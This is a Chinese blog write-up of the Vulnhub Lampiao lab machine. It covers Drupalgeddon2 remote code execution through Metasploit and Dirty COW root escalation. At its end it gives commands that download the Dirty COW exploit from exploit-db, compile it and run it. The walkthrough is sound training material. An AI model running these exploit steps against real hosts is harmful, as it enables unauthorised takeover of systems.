Vulnhub - Lampiao の Write-Up

前言

今天尝试了下Lampiao靶机,这是一台很简单的靶机,没有任何难度。

Step 1

老套路,找靶机IP然后扫描端口:

22,80,1898这三个端口一目了然,主要的注意力肯定在这个Drupal 7服务上。

Step 2

80端口简单看一下:

就是个幌子,分散注意力的,什么有用的都没有。直接聚焦到1898端口:

关于Drupal服务,其实很熟悉,在DC-1这台靶机中就接触过了。在MSF中查找这个漏洞的利用模块,一个一个尝试,很快我们就得到了目标机器的emterpreter。

回过头我们再去了解一下这个漏洞,这是Drupalgeddon-2漏洞,CVE编号CVE-2018-7600,对于默认或常见的Drupal安装来说,该漏洞允许攻击者在未经身份验证的情况下远程执行代码。

Step 3

得到的是低权限的shell,下一步当然就是提权了,通过查看靶机内核,发现这是一台ubuntu 14.04的机器,并且其存在脏牛漏洞

通过脏牛漏洞提权即可获得root权限,flag.txt就在root根目录下:

1
2
3
$ wget https://www.exploit-db.com/download/40847.cpp
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
$ ./dcow -s

文章作者: ColdSnap
文章链接: https://coldwave96.github.io/2020/01/14/Lampiao/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ColdSnap の Blog